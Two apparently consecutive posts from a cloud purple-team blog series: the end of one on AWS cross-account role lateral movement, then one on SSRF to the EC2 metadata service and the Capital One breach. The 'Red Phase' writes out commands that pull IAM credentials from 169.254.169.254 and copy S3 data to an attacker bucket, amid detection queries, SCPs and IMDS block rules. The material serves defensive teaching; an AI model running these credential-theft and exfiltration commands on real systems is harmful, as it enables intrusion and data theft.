ExternalId is a shared secret between the two parties establishing the cross-account trust. When the source role calls sts:AssumeRole, it must provide the ExternalId value, or the assumption is denied.

This protects against the confused deputy problem: an attacker who compromises a role that legitimately trusts your role cannot exploit that trust without also knowing the ExternalId.

# Source (dev Lambda) must pass ExternalId when assuming the prod role
aws sts assume-role \
  --role-arn arn:aws:iam::222222222222:role/datalake-reader \
  --role-session-name "api-processor-job" \
  --external-id "prod-datalake-access-v1"
# If ExternalId is wrong or absent: error — not authorized to assume role

The limitation: ExternalId does not help if the source account itself is compromised and the attacker has access to the application code or environment variables that contain the ExternalId value. It adds friction for opportunistic attackers and covers the confused deputy scenario — it is not a substitute for scoping the principal ARN.

Fix 3: Organizations SCPs to Restrict Cross-Account Assumptions

Service Control Policies at the AWS Organizations level can restrict which accounts are allowed to assume roles in which other accounts. This is the enforcement layer that cannot be bypassed by any identity inside a member account.

// SCP: Only allow cross-account role assumptions between approved account pairs
// Attach to the prod account's OU
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RestrictCrossAccountAssumeRole",
      "Effect": "Deny",
      "Action": "sts:AssumeRole",
      "Resource": "*",
      "Condition": {
        "StringNotEquals": {
          "aws:PrincipalAccount": [
            "111111111111",
            "333333333333"
          ]
        },
        "BoolIfExists": {
          "aws:PrincipalIsAWSService": "false"
        }
      }
    }
  ]
}

This SCP denies any sts:AssumeRole call that originates from an account not in the approved list. Even if someone adds a new trust policy in prod that allows an arbitrary external account, the SCP blocks the call at the organization level.

Fix 4: Enable Access Analyzer Organization-Wide

Access Analyzer should run with an organization-level analyzer, not just per-account. The organization analyzer has visibility across all member accounts and flags cross-account trust policies automatically.

# Create an organization-level analyzer (run from the management account)
aws accessanalyzer create-analyzer \
  --analyzer-name org-wide-access-analyzer \
  --type ORGANIZATION \
  --tags '{"Environment": "production", "Team": "security"}'

# List active findings organization-wide
ANALYZER_ARN=$(aws accessanalyzer list-analyzers \
  --query "analyzers[?type=='ORGANIZATION'].arn | [0]" \
  --output text)

aws accessanalyzer list-findings \
  --analyzer-arn "${ANALYZER_ARN}" \
  --filter '{"resourceType": {"eq": ["AWS::IAM::Role"]}, "status": {"eq": ["ACTIVE"]}}' \
  --output json | \
  jq '.findings[] | {resource: .resource, principal: .principal}'

Fix 5: Prefer OIDC Workload Identity Over Cross-Account Roles

Where the access pattern allows it, replacing the cross-account role with OIDC workload identity eliminates the static trust relationship entirely. A Lambda function with an OIDC identity can authenticate to the prod account by exchanging a token, without any persistent trust policy entry that an attacker could enumerate and exploit.

The federated identity trust boundaries approach using OIDC workload identity removes the assumable role from the attack surface completely — there is no trust policy to misscope, no role ARN to enumerate, and no sts:AssumeRole call in CloudTrail to detect because the assumption never happens.

Fix 6: Enable GuardDuty Cross-Account Threat Detection at Org Level

GuardDuty with multi-account management via AWS Organizations correlates threat signals across accounts. A pattern that looks like routine IAM activity in isolation — role assumption, S3 ListBucket, GetObject — reads as a lateral movement sequence when correlated across dev and prod accounts.

# Enable GuardDuty for all accounts in the organization (from management account)
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty update-organization-configuration \
  --detector-id "${DETECTOR_ID}" \
  --auto-enable \
  --data-sources '{
    "S3Logs": {"AutoEnable": true},
    "Kubernetes": {"AuditLogs": {"AutoEnable": true}},
    "MalwareProtection": {"ScanEc2InstanceWithFindings": {"AutoEnable": true}}
  }'

⚠ Production Gotchas

ExternalId doesn’t protect you if the source account is compromised. The attacker who holds the dev Lambda’s execution role credentials also has access to the Lambda’s environment variables and source code — where the ExternalId value is likely stored. ExternalId is not a secret the attacker can’t reach; it is a value the legitimate caller passes to prove it initiated the request. Scope the principal ARN first; add ExternalId as a second layer.

Access Analyzer only catches public and cross-account access, not intra-account lateral movement. If the attacker is already operating inside the same account as the target role, Access Analyzer does not flag the trust relationship. Intra-account over-broad trust policies require IAM policy analysis tooling (Cloudsplaining, Prowler) to surface — Access Analyzer won’t show them.

Role chaining resets the session clock but the window is still one hour. sts:AssumeRole sessions last up to one hour by default. An attacker doing role chaining gets a fresh one-hour window at each hop. Persistent access requires refreshing before expiry — which means repeated AssumeRole calls in CloudTrail that form a detectable pattern if you’re querying for it.

S3 exfiltration may not trigger GuardDuty immediately. GuardDuty’s Exfiltration:S3/ObjectRead.Unusual finding uses a behavior baseline. A new attacker session has no baseline — the first data exfiltration may not fire the finding if the volume appears “normal” relative to what GuardDuty has seen from that role before. CloudTrail GetObject events are the reliable signal; don’t rely on GuardDuty alone for S3 exfiltration detection.

arn:aws:iam::ACCOUNT:root in a trust policy does not mean the root user specifically. This is a common misread. arn:aws:iam::123456789012:root means any principal in account 123456789012 — IAM users, roles, the root user, and federated identities. It is the account-level wildcard, which is exactly why it’s dangerous in a cross-account trust policy.

Quick Reference

Lateral Movement Technique	CloudTrail Signal	Detection Tool	Structural Fix
Cross-account `sts:AssumeRole`	`AssumeRole` where source accountId ≠ target accountId in role ARN	CloudTrail + Athena query	Scope Principal to specific role ARN
Account root as trust principal	Access Analyzer ACTIVE finding on IAM Role	AWS Access Analyzer	Replace `root` with specific ARN + ExternalId
Role chaining across accounts	Multiple sequential `AssumeRole` events, each with new session token	CloudTrail session correlation	SCP restricting cross-account assumptions to approved pairs
Exfiltration via assumed prod role	S3 `GetObject`/`ListBucket` from assumed-role session in CloudTrail	CloudTrail + GuardDuty `Exfiltration:S3/ObjectRead.Unusual`	Least-privilege S3 policy on prod role + S3 Access Logs
IAM enumeration from compromised identity	`iam:ListRoles`, `iam:GetRole`, `iam:SimulatePrincipalPolicy`	GuardDuty `Recon:IAMUser/UserPermissions`	Deny `iam:*` on Lambda execution roles
Secrets Manager access via assumed role	`secretsmanager:GetSecretValue` from unexpected principal	CloudTrail resource policy audit	Attach resource policy to secrets scoping allowed principals

Key Takeaways

Cloud lateral movement IAM chains are not exploits — they are valid API calls that execute because someone wrote a trust policy that was too broad; the fix is always in the trust policy, not in the network
Every cross-account trust policy that uses arn:aws:iam::ACCOUNT:root as the principal is an open door for any compromised identity in that account — scope it to the specific role ARN before an attacker finds it before you do
CloudTrail AssumeRole events where the principal’s account ID doesn’t match the target role’s account ID are the detection signal; run the Athena query in your environment this week and look at what comes back
AWS Access Analyzer with an organization-level analyzer surfaces the vulnerable trust policies automatically — if you’re not running it, you’re auditing trust policies manually or not at all
IAM privilege escalation paths and cross-account lateral movement compound: an attacker who escalates privilege inside a source account has more roles to attempt cross-account assumptions from, extending the blast radius further
Defense in depth requires all three layers: scoped trust policy principal, ExternalId condition, and an SCP blocking assumptions from non-approved accounts — any single layer has a bypass

What’s Next

EP11 is where the series pivots from attack paths to detection engineering. We’ve covered how attackers compromise identities, escalate privilege, move laterally through cloud accounts, and exfiltrate data. EP11 asks a harder question: how do you build detection rules that catch these techniques at the kernel level — before the attack completes, not after it shows up in CloudTrail?

The answer involves eBPF: kernel-level visibility that gives you process execution context, network connections, and file system access in real time, mapped to the cloud workload identity making the API calls. A SIEM ingesting CloudTrail logs sees what happened after the fact. eBPF running on the node sees the aws sts assume-role subprocess spawn, the credential file write, and the outbound S3 connection — while it’s happening.

Get EP11 in your inbox when it publishes → subscribe at linuxcent.com

SSRF to Cloud Metadata: How IMDSv1 Enabled the Capital One Breach

June 22, 2026 by Vamshi Krishna Santhapuri

Reading Time: 15 minutes

What Is Purple Team? → OWASP Top 10 Cloud → Breach Landscape 2020–2025 → Broken Access Control → MFA Fatigue → CI/CD Secrets → SSRF to Cloud Metadata

TL;DR

SSRF cloud metadata attack is OWASP A10: an attacker exploits a server-side request forgery vulnerability to reach 169.254.169.254 — the EC2 Instance Metadata Service — and retrieve IAM role credentials without authentication
IMDSv1 (the default before 2019) requires no authentication token; any HTTP request from the instance to the IMDS endpoint returns credentials — SSRF anywhere in the stack is sufficient
Capital One (2019): a misconfigured WAF running on EC2 had an SSRF vulnerability → attacker hit the IMDS endpoint → retrieved IAM role credentials → enumerated and exfiltrated over 100 million customer records from S3; $190M settlement
IMDSv2 requires a PUT request to obtain a session token first — a CSRF/SSRF-blocked flow — making the IMDS resistant to standard SSRF exploitation; --http-tokens required is the one-line enforcement
Hop limit of 1 is the container-layer defense: it prevents any process inside a container from reaching IMDS because the TTL expires before the packet traverses the additional network layer
The structural fix is eliminating the credential entirely: OIDC workload identity eliminates static credentials replaces the attached IAM role with a dynamically issued, scoped token — no IMDS credential to steal

OWASP Mapping: A10 — Server-Side Request Forgery (SSRF). The attacker causes the server to make a request to an unintended destination — in this case, the link-local metadata endpoint that returns cloud IAM credentials.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│                    SSRF → IMDS → CREDENTIAL CHAIN                       │
│                                                                         │
│   ATTACKER                                                              │
│      │                                                                  │
│      │  1. Discovers SSRF in web app (WAF, proxy, image fetch, etc.)    │
│      │                                                                  │
│      ▼                                                                  │
│   WEB APP / WAF (running on EC2)                                        │
│      │                                                                  │
│      │  2. App follows attacker-controlled URL                          │
│      │     GET http://169.254.169.254/latest/meta-data/                 │
│      │     iam/security-credentials/ROLE_NAME                          │
│      ▼                                                                  │
│   EC2 INSTANCE METADATA SERVICE (IMDSv1 — no auth required)            │
│      │                                                                  │
│      │  3. Returns JSON: AccessKeyId, SecretAccessKey, Token            │
│      ▼                                                                  │
│   ATTACKER (now has temporary IAM credentials)                          │
│      │                                                                  │
│      │  4. aws sts get-caller-identity → confirm identity               │
│      │  5. aws s3 ls → enumerate all accessible buckets                 │
│      │  6. aws s3 cp s3://target-bucket/ . --recursive                  │
│      ▼                                                                  │
│   100M+ customer records exfiltrated                                    │
│                                                                         │
│   ─────────────────────────────────────────────────────────────────     │
│   IMDSv2 BREAKS THIS CHAIN AT STEP 2                                    │
│   PUT /latest/api/token required first → SSRF can't follow             │
│   (SSRF typically cannot initiate a PUT before a GET)                   │
│                                                                         │
└─────────────────────────────────────────────────────────────────────────┘

The SSRF cloud metadata attack chain is short enough to fit in a single diagram because there are only three moving parts: the SSRF vulnerability, an unauthenticated metadata endpoint, and the IAM credentials waiting behind it. Remove any one of those three elements and the chain breaks. Capital One had all three.

The Incident: Capital One (2019)

In March 2019, a misconfigured WAF at Capital One was running on AWS EC2. The WAF was a commercial product deployed in an EC2 instance with an attached IAM role — standard practice, necessary for the WAF to interact with other AWS services.

The attacker, later identified as Paige Thompson (arrested July 2019, former AWS engineer), found an SSRF vulnerability in the WAF’s configuration. The exact misconfiguration has been described as a firewall rule that allowed the instance to make outbound requests to internal destinations, including the link-local metadata endpoint.

The attack chain, reconstructed from court documents and Capital One’s public disclosures:

1. Identify SSRF in WAF
   ├── WAF accepts HTTP requests and forwards them to backend
   └── Attacker crafts request that causes WAF to make outbound HTTP call
       to attacker-controlled destination — confirms SSRF exists

2. Target the IMDS endpoint
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       (link-local address, reachable only from within the EC2 instance)

3. Enumerate the attached role
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/
       → returns role name: "capital-one-waf-role" (illustrative)

4. Retrieve the credentials
   └── http://169.254.169.254/latest/meta-data/iam/security-credentials/capital-one-waf-role
       → returns: AccessKeyId, SecretAccessKey, Token, Expiration

5. Export credentials to attacker-controlled system
   └── The SSRF response body contains the JSON credential blob
       Attacker exfiltrates the JSON out-of-band

6. Use credentials from external system
   ├── aws configure (with stolen AccessKeyId, SecretAccessKey, Token)
   ├── aws sts get-caller-identity → confirm IAM role identity
   ├── aws s3 ls → lists all S3 buckets the role can see
   └── aws s3 cp s3://[capital-one-bucket]/ . --recursive
       → 106 million customer records
       → 140,000 Social Security numbers
       → 80,000 bank account numbers

IMDSv1 required no authentication. The WAF’s attached IAM role had s3:GetObject and s3:ListBucket permissions scoped broadly enough to reach the data buckets. The SSRF was the entry point; the unauthenticated metadata endpoint was the amplifier; the overly permissive IAM role was the impact multiplier.

Capital One paid a $190M settlement. AWS did not change IMDSv1 as a result — they had already released IMDSv2 in November 2019, months after the breach was discovered (July 2019). The breach timeline predates IMDSv2 availability. What it demonstrated was not a zero-day but a known architectural weakness that had been present since EC2 launched.

The revelation that the industry took away: IMDSv1 has no authentication. Any SSRF vulnerability anywhere in your stack — in the application, in a WAF, in a sidecar, in a Lambda calling your EC2 — is a straight line to your IAM role credentials. The SSRF doesn’t need to be severe or complex. It just needs to reach 169.254.169.254.

Red Phase: How the Attack Works

What SSRF Is

Server-Side Request Forgery is a vulnerability class where an attacker can cause the server to make HTTP requests to destinations of the attacker’s choosing. The server acts as a proxy: the request originates from the server’s network context, not the attacker’s. This is what makes it dangerous in cloud environments — the server has access to link-local addresses, VPC-internal services, and cloud metadata endpoints that the attacker cannot reach directly from the internet.

SSRF surfaces in any feature that causes the server to fetch a URL on behalf of the user:
– Image URL upload/preview (e.g., “fetch this avatar URL”)
– Webhook configuration (server calls a URL you provide)
– PDF generation from URL
– Reverse proxies and WAFs with request-forwarding rules
– Server-side URL validation endpoints

Why the Metadata Endpoint Is the Target

169.254.169.254 is the IPv4 link-local address AWS reserves for the Instance Metadata Service (IMDS). It is only reachable from within the EC2 instance itself — not from the VPC, not from the internet. Every EC2 instance has it. No security group rule can block it because it does not traverse the VPC network stack. It is a hypervisor-level endpoint injected into the instance.

The IMDS endpoint serves instance-specific data: instance ID, AMI ID, region, availability zone, network interfaces — and, critically, the temporary credentials for any IAM role attached to the instance.

# (IMDSv1 — no token required, works with a plain curl)

# Step 1: Enumerate what's available under iam/
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Output: the name of the attached IAM role
# Example output: MyApplicationRole

# Step 2: Retrieve the credentials for that role
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole

The response from Step 2 looks like this:

{
  "Code": "Success",
  "LastUpdated": "2019-03-22T18:03:30Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAQFAKEKEYIDEXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY",
  "Token": "FQoDYXdzEJr//////////wEa...very-long-session-token...==",
  "Expiration": "2019-03-22T24:03:30Z"
}

These are real, valid AWS temporary credentials. The Token field is the STS session token. All three values together authenticate as the IAM role attached to the instance, with whatever permissions that role has been granted.

The Full Attack Chain

Step-by-step, with the commands an attacker would run after recovering credentials from an SSRF:

Step 1: Confirm the SSRF and find the metadata endpoint

# Attacker sends request that causes the vulnerable server to fetch a URL
# The exact mechanism depends on the vulnerability (webhook, image URL, etc.)
# For a Capital One-style WAF SSRF, this might be a crafted HTTP header

# Test if SSRF can reach IMDS:
# Attacker controls a listener (e.g., Burp Collaborator, requestbin)
# then pivots to the metadata endpoint once SSRF is confirmed

Step 2: Exfiltrate credentials via SSRF

# Via the SSRF, the server makes this request:
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
# → returns role name in response body

curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/MyApplicationRole
# → returns AccessKeyId, SecretAccessKey, Token JSON

Step 3: Use credentials from attacker’s system

# Export the stolen credentials
export AWS_ACCESS_KEY_ID="ASIAQFAKEKEYIDEXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYFAKESECRETKEY"
export AWS_SESSION_TOKEN="FQoDYXdzEJr...=="

# Confirm identity
aws sts get-caller-identity
# Output shows which account and role — confirms credentials are valid

{
    "UserId": "AROAQFAKEUSERID:i-01234567890abcdef0",
    "Account": "123456789012",
    "Arn": "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0"
}

Step 4: Enumerate and exfiltrate

# List all accessible S3 buckets
aws s3 ls
# Output: all buckets the role has s3:ListBucket on

# List contents of a specific bucket
aws s3 ls s3://target-bucket/ --recursive | head -50

# Check what IAM actions are allowed (enumerate permissions)
aws iam simulate-principal-policy \
  --policy-source-arn "arn:aws:sts::123456789012:assumed-role/MyApplicationRole/i-01234567890abcdef0" \
  --action-names "s3:GetObject" "s3:PutObject" "ec2:DescribeInstances" "iam:ListRoles" \
  --query 'EvaluationResults[?EvalDecision==`allowed`].EvalActionName' \
  --output text

# Exfiltrate
aws s3 cp s3://target-bucket/ /tmp/exfil/ --recursive
# Or to attacker-controlled bucket:
aws s3 sync s3://target-bucket/ s3://attacker-bucket/

Simulating It Safely: Test IMDSv1 Enforcement on Your Own Instances

Before running detection controls, confirm which of your instances are still vulnerable:

# Test 1: Can you reach IMDS at all? (run from inside the instance)
curl -s http://169.254.169.254/latest/meta-data/ --max-time 2
# If this returns a list of metadata fields, IMDS is reachable

# Test 2: Is IMDSv1 still enabled? (no token required)
curl -s http://169.254.169.254/latest/meta-data/instance-id --max-time 2
# If this returns an instance ID without supplying a token → IMDSv1 is enabled
# Example output: i-01234567890abcdef0

# Test 3: Check the enforcement state via AWS CLI (from outside the instance)
aws ec2 describe-instances \
  --instance-ids i-01234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'

[
    {
        "State": "applied",
        "HttpTokens": "optional",           ← "optional" means IMDSv1 is still enabled
        "HttpPutResponseHopLimit": 1,
        "HttpEndpoint": "enabled",
        "HttpProtocolIpv6": "disabled",
        "InstanceMetadataTags": "disabled"
    }
]

"HttpTokens": "optional" means IMDSv1 is still active. Any SSRF in the instance’s software stack can reach these credentials without a token.

# Audit all instances in a region for IMDSv1 exposure
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{
    InstanceId: InstanceId,
    Name: Tags[?Key==`Name`].Value | [0],
    HttpTokens: MetadataOptions.HttpTokens,
    HopLimit: MetadataOptions.HttpPutResponseHopLimit
  }' \
  --output table | \
  grep -E "optional|INSTANCE"
# Any row showing "optional" is IMDSv1-exposed

Blue Phase: Detection

What CloudTrail Logs When IMDS Credentials Are Abused

The IMDS credential theft itself is silent — there is no CloudTrail event for an IMDS GET request. The attacker’s use of the stolen credentials is what generates logs. The key signal is GetCallerIdentity from an unusual source IP paired with the instance role’s ARN appearing in CloudTrail from an IP that is not the instance itself.

# Find API calls made using instance role credentials from external IPs
# Instance roles appear in CloudTrail as assumed-role ARNs
DETECTOR_ROLE="MyApplicationRole"
INSTANCE_IP="10.0.1.50"  # Your instance's known IP

aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=GetCallerIdentity \
  --start-time "$(date -d '7 days ago' --iso-8601=seconds)" \
  --query 'Events[].CloudTrailEvent' \
  --output text | \
  jq -r 'fromjson |
    select(.userIdentity.sessionContext.sessionIssuer.userName == "'"${DETECTOR_ROLE}"'") |
    {
      time: .eventTime,
      event: .eventName,
      sourceIP: .sourceIPAddress,
      userAgent: .userAgent,
      region: .awsRegion,
      roleArn: .userIdentity.arn
    }' | \
  jq "select(.sourceIP != \"${INSTANCE_IP}\")"
  # Any result here = role credentials being used from outside the instance

The tell: the userIdentity.arn will contain the instance ID as the role session name (e.g., assumed-role/MyApplicationRole/i-01234567890abcdef0). If that ARN is making API calls from an IP address that is not the EC2 instance, someone has stolen the credentials and is using them externally.

GuardDuty: The Purpose-Built Finding

GuardDuty has a specific finding for exactly this scenario:

UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS

This finding fires when GuardDuty detects that temporary credentials associated with an EC2 instance role are being used from an IP address outside of AWS entirely — meaning someone has physically exfiltrated the credentials to their own system and is using them from there.

# Retrieve this specific finding type from GuardDuty
DETECTOR_ID=$(aws guardduty list-detectors --query 'DetectorIds[0]' --output text)

aws guardduty list-findings \
  --detector-id "${DETECTOR_ID}" \
  --finding-criteria '{
    "Criterion": {
      "type": {
        "Equals": [
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS",
          "UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS"
        ]
      }
    }
  }' \
  --query 'FindingIds' --output text | \
  xargs -n 10 aws guardduty get-findings \
    --detector-id "${DETECTOR_ID}" \
    --finding-ids | \
  jq '.Findings[] | {
    type: .Type,
    severity: .Severity,
    instance: .Resource.InstanceDetails.InstanceId,
    role: .Resource.AccessKeyDetails.UserName,
    externalIP: .Service.Action.NetworkConnectionAction.RemoteIpDetails.IpAddressV4,
    firstSeen: .Service.EventFirstSeen,
    lastSeen: .Service.EventLastSeen
  }'

A second finding to watch:

Recon:IAMUser/UserPermissions — fires when the stolen credentials are used to enumerate IAM permissions (the iam:SimulatePrincipalPolicy call from the attacker’s Step 4 above). Often appears immediately before the data exfiltration events.

VPC Flow Logs: Connections to 169.254.169.254

VPC Flow Logs do not capture traffic to the IMDS endpoint by default — but they can capture egress from EC2 instances in ways that reveal post-exploitation. More useful for IMDS abuse is querying for unexpected source IPs calling the IMDS from within the VPC:

# Athena query against VPC flow logs
# Find: connections to 169.254.169.254 from unexpected source IPs
# (useful in containerized environments where only the instance itself should call IMDS)

SELECT
  srcaddr,
  dstaddr,
  srcport,
  dstport,
  protocol,
  packets,
  bytes,
  action,
  log_status,
  from_unixtime(start) as start_time
FROM vpc_flow_logs
WHERE
  dstaddr = '169.254.169.254'
  AND action = 'ACCEPT'
  AND from_unixtime(start) > current_timestamp - interval '24' hour
ORDER BY start_time DESC;

If you see source IPs in this query that are not your EC2 instance’s primary private IP — for example, container IPs within the pod CIDR — and you have --http-put-response-hop-limit 1 set, those requests should be failing. If they’re succeeding, the hop limit is not enforced.

IMDSv2 Hop Limit: Why It Blocks Containerized Attacks

The hop limit is a separate defense from the token requirement. With --http-put-response-hop-limit 1, the PUT request to obtain an IMDSv2 token has a TTL of 1. When a process running inside a container tries to reach the IMDS, the request must traverse:

Container network namespace → veth pair → host network namespace → hypervisor IMDS endpoint

That traversal decrements the TTL below 1, and the PUT request never reaches the IMDS endpoint. The token is never issued. The GET request that follows has no token and — if --http-tokens required is also set — is rejected.

Hop limit = 1:
  Container → veth → [TTL=0, packet dropped]
  IMDS never receives the PUT, never issues a token

Hop limit = 2 (required for EKS with IMDS access):
  Container → veth → host → IMDS
  Token is issued; GET with token succeeds
  ← Use this only when container workloads legitimately need IMDS

For EKS specifically: use hop limit 2 only on nodes where pods have a legitimate need to call IMDS (rare). The preferred approach is pod-level identity via OIDC workload identity eliminates static credentials — pods get short-lived tokens scoped to their service account, not the node’s IAM role.

Purple Phase: Structural Fixes

Fix 1: Enforce IMDSv2 — The Non-Negotiable Control

This is not optional. Every EC2 instance running production workloads should have --http-tokens required. The operational cost is near zero; the risk reduction is complete for the SSRF-to-IMDS credential chain.

# Enforce IMDSv2 on a running instance
aws ec2 modify-instance-metadata-options \
  --instance-id i-1234567890abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1

# Verify the change took effect
aws ec2 describe-instances \
  --instance-ids i-1234567890abcdef0 \
  --query 'Reservations[].Instances[].MetadataOptions'
# "HttpTokens": "required" confirms IMDSv2 is enforced

# Enforce IMDSv2 in a launch template (all new instances launched from this template)
aws ec2 create-launch-template-version \
  --launch-template-id lt-0abcdef1234567890 \
  --source-version '$Latest' \
  --launch-template-data '{
    "MetadataOptions": {
      "HttpTokens": "required",
      "HttpPutResponseHopLimit": 1,
      "HttpEndpoint": "enabled"
    }
  }'

# Set this new version as the default
aws ec2 modify-launch-template \
  --launch-template-id lt-0abcdef1234567890 \
  --default-version '$Latest'

# Bulk remediation: enforce IMDSv2 on all instances in a region where
# HttpTokens is currently "optional"
aws ec2 describe-instances \
  --query 'Reservations[].Instances[?MetadataOptions.HttpTokens==`optional`].InstanceId' \
  --output text | \
  tr '\t' '\n' | \
  while read instance_id; do
    echo "Enforcing IMDSv2 on: $instance_id"
    aws ec2 modify-instance-metadata-options \
      --instance-id "$instance_id" \
      --http-tokens required \
      --http-put-response-hop-limit 1
  done

Fix 2: SCP to Block IMDSv1 Org-Wide

An SCP prevents any account in your organization from launching instances with IMDSv1 enabled, and blocks modification of existing instances to re-enable it. This is the org-level control that makes IMDSv2 enforcement durable — individual account teams can’t accidentally revert it.

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RequireIMDSv2OnNewInstances",
      "Effect": "Deny",
      "Action": "ec2:RunInstances",
      "Resource": "arn:aws:ec2:*:*:instance/*",
      "Condition": {
        "StringNotEquals": {
          "ec2:MetadataHttpTokens": "required"
        }
      }
    },
    {
      "Sid": "DenyIMDSv1ReEnablement",
      "Effect": "Deny",
      "Action": "ec2:ModifyInstanceMetadataOptions",
      "Resource": "*",
      "Condition": {
        "StringEquals": {
          "ec2:MetadataHttpTokens": "optional"
        }
      }
    }
  ]
}

Apply this SCP to all OUs except the management account. New ec2:RunInstances calls that don’t include MetadataOptions.HttpTokens=required will be denied. Existing instances can be remediated with the bulk script above; once remediated, the second statement prevents reverting.

Fix 3: OIDC Workload Identity — Eliminate the Credential Entirely

Enforcing IMDSv2 removes the SSRF-to-IMDS path. OIDC workload identity eliminates static credentials removes the entire credential from the picture — there is no long-lived IAM role credential attached to the instance, so there is nothing for SSRF to retrieve.

For Kubernetes workloads on EKS: use IAM Roles for Service Accounts (IRSA) or EKS Pod Identity. The pod’s service account is bound to an IAM role via OIDC. The pod gets short-lived, automatically rotated credentials scoped to that specific role. The node’s instance profile requires no IAM permissions for application workloads.

# EKS Pod Identity: associate a service account with an IAM role
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace my-app \
  --service-account my-app-sa \
  --role-arn arn:aws:iam::123456789012:role/my-app-role

# The pod receives credentials via a projected volume token, not IMDS
# Even if an attacker gets SSRF inside the pod, IMDS has no useful credentials for them
# The most they get: instance metadata (instance ID, AMI, AZ) — not IAM credentials

Fix 4: Restrict SSRF at the Network and Application Layer

IMDSv2 enforcement is the primary control. Defence in depth adds:

# WAF rule (AWS WAF): block requests where the URL contains the IMDS address
# This catches simple SSRF attempts at the perimeter before they reach your app
# Deploy as a managed rule group or custom rule:

# AWS CLI: create a WAF rule to block IMDS-targeting SSRFs
aws wafv2 create-rule-group \
  --name "BlockSSRFToIMDS" \
  --scope REGIONAL \
  --capacity 10 \
  --rules '[
    {
      "Name": "BlockIMDSAccess",
      "Priority": 0,
      "Statement": {
        "ByteMatchStatement": {
          "SearchString": "169.254.169.254",
          "FieldToMatch": {"QueryString": {}},
          "TextTransformations": [{"Priority": 0, "Type": "NONE"}],
          "PositionalConstraint": "CONTAINS"
        }
      },
      "Action": {"Block": {}},
      "VisibilityConfig": {
        "SampledRequestsEnabled": true,
        "CloudWatchMetricsEnabled": true,
        "MetricName": "BlockIMDSAccess"
      }
    }
  ]' \
  --visibility-config SampledRequestsEnabled=true,CloudWatchMetricsEnabled=true,MetricName=BlockSSRFToIMDS

# Egress filtering: block EC2 instances from making outbound requests
# to the IMDS address from application code (defense in depth via iptables)
# This only applies if your application runs as a non-root user
# Root processes bypass this — it is a secondary control, not primary

# On the EC2 instance, block application user (uid 1001) from reaching IMDS
iptables -A OUTPUT \
  -m owner --uid-owner 1001 \
  -d 169.254.169.254 \
  -j REJECT \
  --reject-with icmp-port-unreachable

# Only the instance's AWS SDK calls (typically running as a system service with different uid)
# should need IMDS access — scope accordingly

Note: iptables-based egress filtering is a secondary control. A root process, or any process with CAP_NET_ADMIN, can bypass or modify these rules. The primary control remains IMDSv2 enforcement.

⚠ Production Gotchas

Legacy AWS SDK versions that only support IMDSv1. AWS SDK for Java v1 and Python (boto3 < 1.9.220) do not support IMDSv2 by default. Enforcing --http-tokens required on an instance running a legacy SDK will break credential refresh for the running application. Before enforcing IMDSv2 on a running instance, verify the SDK version used by all processes that call IMDS. Upgrade the SDK if needed; then enforce IMDSv2. The AWS Config rule ec2-imdsv2-check flags non-compliant instances but does not check SDK versions — that inventory step is manual.

# Check boto3 version on an instance
python3 -c "import boto3; print(boto3.__version__)"
# Requires >= 1.9.220 for IMDSv2 support

# Check AWS SDK for Java via jar manifest (if applicable)
find /opt /app -name "aws-java-sdk-core-*.jar" 2>/dev/null | \
  while read jar; do
    unzip -p "$jar" META-INF/MANIFEST.MF 2>/dev/null | grep "Implementation-Version"
  done
# AWS SDK for Java v1 < 1.11.678 does not support IMDSv2 by default

EKS node groups and hop limit 2. If you run EKS and pods need to use IRSA (IAM Roles for Service Accounts), the pods themselves do not use IMDS — they use a projected service account token. You should be safe with hop limit 1 on EKS nodes in most cases. However, if you have DaemonSets or system components that fetch instance metadata directly (some cluster autoscaler versions, node monitoring agents), hop limit 1 will break them. Audit which processes on your nodes actually call IMDS before setting hop limit 1 on EKS. The aws eks create-managed-node-group default is hop limit 2 for this reason; you can reduce it once you’ve confirmed nothing breaks.

GuardDuty’s 5–15 minute detection delay. UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration is not a real-time control. GuardDuty aggregates events and applies ML-based anomaly detection — the finding typically appears 5 to 15 minutes after the first anomalous API call. A credential with broad S3 permissions can exfiltrate a significant volume of data in that window. GuardDuty detects the breach; it does not prevent the initial exfiltration. Pair it with: IAM permission boundaries that scope the blast radius, and S3 data events in CloudTrail with real-time EventBridge rules for high-sensitivity buckets.

# EventBridge rule: alert immediately on S3 data events from unexpected sources
# (complements GuardDuty's delayed finding)
aws events put-rule \
  --name "S3DataEventFromUnexpectedSource" \
  --event-pattern '{
    "source": ["aws.s3"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {
      "eventSource": ["s3.amazonaws.com"],
      "eventName": ["GetObject"],
      "userIdentity": {
        "sessionContext": {
          "sessionIssuer": {
            "userName": ["MyApplicationRole"]
          }
        }
      }
    }
  }' \
  --state ENABLED

Disabling the IMDS endpoint entirely. You can set --http-endpoint disabled to turn off IMDS access altogether. Do this only on instances where you are certain no running process needs instance metadata. ECS and EKS managed nodes need IMDS for node registration and credential delivery to the container agent. Application-only EC2 instances that use OIDC/IRSA and have no SDK calls to IMDS are candidates for full endpoint disablement.

Quick Reference

IMDSv1 vs IMDSv2

Attribute	IMDSv1	IMDSv2
